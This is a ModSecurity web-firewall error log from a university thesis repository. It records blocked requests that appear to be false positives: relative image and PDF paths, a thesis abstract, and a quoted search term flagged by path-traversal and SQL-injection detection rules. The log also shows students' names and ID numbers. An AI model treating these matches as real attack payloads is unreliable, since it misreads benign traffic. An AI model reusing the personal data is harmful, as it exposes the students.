[Mon Aug 28 11:11:20.131061 2023] [:error] [pid 41139] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Aldiansyah_Bainil.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOweaMCo-f0AAKCzup8AAAAT"]
[Mon Aug 28 11:11:26.975779 2023] [:error] [pid 41143] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_MUTIARA_AULIA_DEWI_41152010170032.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwebsCo-f0AAKC3O6YAAAAU"]
[Mon Aug 28 11:11:30.163369 2023] [:error] [pid 41054] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER-DAFTAR LAMPIRAN Yuyun Hasibuan.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwecsCo-f0AAKBexhoAAAAA"]
[Mon Aug 28 11:11:45.099311 2023] [:error] [pid 41052] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//01.COVER - DAFTAR LAMPIRAN Gery Renaldi.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwegcCo-f0AAKBc3m4AAAAS"]
[Mon Aug 28 11:12:04.000555 2023] [:error] [pid 41150] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER s.d DAFTAR LAMPIRAN Luthfiyyah Azzahra Ramadhani.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwek8Co-f0AAKC@jg0AAAAZ"]
[Mon Aug 28 11:12:18.127674 2023] [:error] [pid 41193] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB I Luthfiyyah Azzahra Ramadhani.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOweosCo-f0AAKDpazQAAAAI"]
[Mon Aug 28 11:21:42.824470 2023] [:error] [pid 41297] [client 47.128.21.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Neng_Cantika_Pebrianti_page-0001.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwg1sCo-f0AAKFRi2UAAAAP"]
[Mon Aug 28 11:33:02.870804 2023] [:error] [pid 41462] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Fadiila_Hasyanah_41152020190024-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwjfsCo-f0AAKH29AQAAAAN"]
[Mon Aug 28 11:33:06.971106 2023] [:error] [pid 41523] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER-DAFTAR LAMPIRAN_Fadiila Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwjgsCo-f0AAKIzV@cAAAAZ"]
[Mon Aug 28 11:46:15.500532 2023] [:error] [pid 41746] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  : ( found within ARGS:notes: Penelitian ini bertujuan untuk mengetahui pengaruh yang dihasilkan oleh\\x0d\\x0ateknologi informasi dan sistem informasi akuntansi terhadap proses bisnis pada PT.\\x0d\\x0aIndomarco Pristama Bandung. Hasil dari penelitian ini diharapkan mampu menjadi\\x0d\\x0asolusi atas malasah-masalah yang terjadi pada proses bisnis. Informasi data yang di\\x0d\\x0aperoleh melalui survei dengan membagikan angket/kuesioner pada PT. Indomarco\\x0d\\x0aPristama Bandung. Pengolahan data s..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwml8Co-f0AAKMSDEAAAAAJ"]
[Mon Aug 28 11:56:20.676338 2023] [:error] [pid 41951] [client 47.128.17.221] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Melin_Meilina_41152010160183.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwo9MCo-f0AAKPfsbwAAAAE"]
[Mon Aug 28 11:57:47.188867 2023] [:error] [pid 41950] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  : ( found within ARGS:notes: Penelitian ini bertujuan untuk mengetahui pengaruh yang dihasilkan oleh\\x0d\\x0ateknologi informasi dan sistem informasi akuntansi terhadap proses bisnis pada PT.\\x0d\\x0aIndomarco Pristama Bandung. Hasil dari penelitian ini diharapkan mampu menjadi\\x0d\\x0asolusi atas malasah-masalah yang terjadi pada proses bisnis. Informasi data yang di\\x0d\\x0aperoleh melalui survei dengan membagikan angket/kuesioner pada PT. Indomarco\\x0d\\x0aPristama Bandung. Pengolahan data s..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwpS8Co-f0AAKPeZ3QAAAAA"]
[Mon Aug 28 12:04:20.148741 2023] [:error] [pid 42040] [client 47.128.28.151] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Man-2019\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwq1MCo-f0AAKQ4k1gAAAAN"]
[Mon Aug 28 12:25:04.936524 2023] [:error] [pid 42596] [client 180.244.129.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_MARIA_CLAUDIA_FRANSISKA_SINURAT_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwvsMCo-f0AAKZkYyoAAAAH"]
[Mon Aug 28 12:25:18.540631 2023] [:error] [pid 42427] [client 180.244.129.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB 2 MARIA CLAUDIA FRANSISKA SINURAT.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwvvsCo-f0AAKW7IscAAAAA"]
[Mon Aug 28 12:25:35.371803 2023] [:error] [pid 42600] [client 180.244.129.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB 2 MARIA CLAUDIA FRANSISKA SINURAT.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwvz8Co-f0AAKZo1H0AAAAN"]
[Mon Aug 28 12:29:18.470625 2023] [:error] [pid 42654] [client 180.244.129.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_MARIA_CLAUDIA_FRANSISKA_SINURAT_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwwrsCo-f0AAKaeW48AAAAJ"]
[Mon Aug 28 12:29:23.241478 2023] [:error] [pid 42408] [client 180.244.129.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB 2 MARIA CLAUDIA FRANSISKA SINURAT.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwws8Co-f0AAKWo@94AAAAD"]
[Mon Aug 28 12:29:56.830847 2023] [:error] [pid 42407] [client 180.244.129.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Desna_Yustika_Sari.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOww1MCo-f0AAKWn3tEAAAAB"]
[Mon Aug 28 12:30:01.901248 2023] [:error] [pid 42661] [client 180.244.129.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB II Desna Yustika Sari.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOww2cCo-f0AAKalodwAAAAU"]
[Mon Aug 28 13:00:44.634945 2023] [:error] [pid 43228] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_-_Otniel_Heru_Chrisardi_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOw4DMCo-f0AAKjcPF0AAAAd"]
[Mon Aug 28 13:02:07.553803 2023] [:error] [pid 43243] [client 47.128.20.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Friska_Zagita_Sagala_41152020150103.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOw4X8Co-f0AAKjrEqYAAAAZ"]
[Mon Aug 28 13:15:17.306561 2023] [:error] [pid 43525] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  : ( found within ARGS:notes: Penelitian ini bertujuan untuk mengetahui pengaruh yang dihasilkan oleh\\x0d\\x0ateknologi informasi dan sistem informasi akuntansi terhadap proses bisnis pada PT.\\x0d\\x0aIndomarco Pristama Bandung. Hasil dari penelitian ini diharapkan mampu menjadi\\x0d\\x0asolusi atas malasah-masalah yang terjadi pada proses bisnis. Informasi data yang di\\x0d\\x0aperoleh melalui survei dengan membagikan angket/kuesioner pada PT. Indomarco\\x0d\\x0aPristama Bandung. Pengolahan data s..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw7dcCo-f0AAKoFRbgAAAAP"]
[Mon Aug 28 13:17:39.818502 2023] [:error] [pid 43467] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Fadiila_Hasyanah_41152020190024-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOw8A8Co-f0AAKnLyx0AAAAA"]
[Mon Aug 28 13:17:45.575569 2023] [:error] [pid 43574] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//LAMPIRAN_Fadilla Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOw8CcCo-f0AAKo2RawAAAAH"]
[Mon Aug 28 13:17:56.422937 2023] [:error] [pid 43574] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//DAFTAR PUSTAKA_Fadilla Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOw8FMCo-f0AAKo2Ra4AAAAH"]
[Mon Aug 28 13:17:59.792661 2023] [:error] [pid 43574] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB V_Fadilla Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOw8F8Co-f0AAKo2RbAAAAAH"]
[Mon Aug 28 13:24:25.045528 2023] [:error] [pid 43373] [client 47.128.22.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Mohamad_Dian_Misgiantoro_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOw9mcCo-f0AAKltGyYAAAAG"]
[Mon Aug 28 13:26:54.143641 2023] [:error] [pid 43660] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER-DAFTAR LAMPIRAN_Fadiila Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOw@LsCo-f0AAKqMxUoAAAAS"]
[Mon Aug 28 13:29:47.131286 2023] [:error] [pid 43773] [client 114.5.251.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Meisa_Tasya_Gita-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOw@28Co-f0AAKr9ZsoAAAAD"]
[Mon Aug 28 13:29:56.169071 2023] [:error] [pid 43774] [client 114.5.251.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Bab III Meisa Tasya Gita.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOw@5MCo-f0AAKr@oxMAAAAE"]
[Mon Aug 28 13:29:58.160694 2023] [:error] [pid 43774] [client 114.5.251.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_NADA_TIARA-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOw@5sCo-f0AAKr@oxYAAAAE"]
[Mon Aug 28 13:30:00.797001 2023] [:error] [pid 43693] [client 114.5.251.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB IV HASIL PENELITIAN "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOw@6MCo-f0AAKqtn3gAAAAf"]
[Mon Aug 28 13:31:29.713009 2023] [:error] [pid 43676] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER-DAFTAR LAMPIRAN_Fadiila Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOw-QcCo-f0AAKqcCPcAAAAL"]
[Mon Aug 28 13:31:54.345385 2023] [:error] [pid 43668] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER-DAFTAR LAMPIRAN_Fadiila Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOw-WsCo-f0AAKqUOLoAAAAC"]
[Mon Aug 28 13:35:38.908452 2023] [:error] [pid 43777] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB II_Fadilla Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxAOsCo-f0AAKsBICEAAAAA"]
[Mon Aug 28 13:41:50.927025 2023] [:error] [pid 44195] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB II_Fadilla Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxBrsCo-f0AAKyjRc0AAAAB"]
[Mon Aug 28 13:43:29.991783 2023] [:error] [pid 44238] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Fadiila_Hasyanah_41152020190024-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxCEcCo-f0AAKzOr8YAAAAN"]
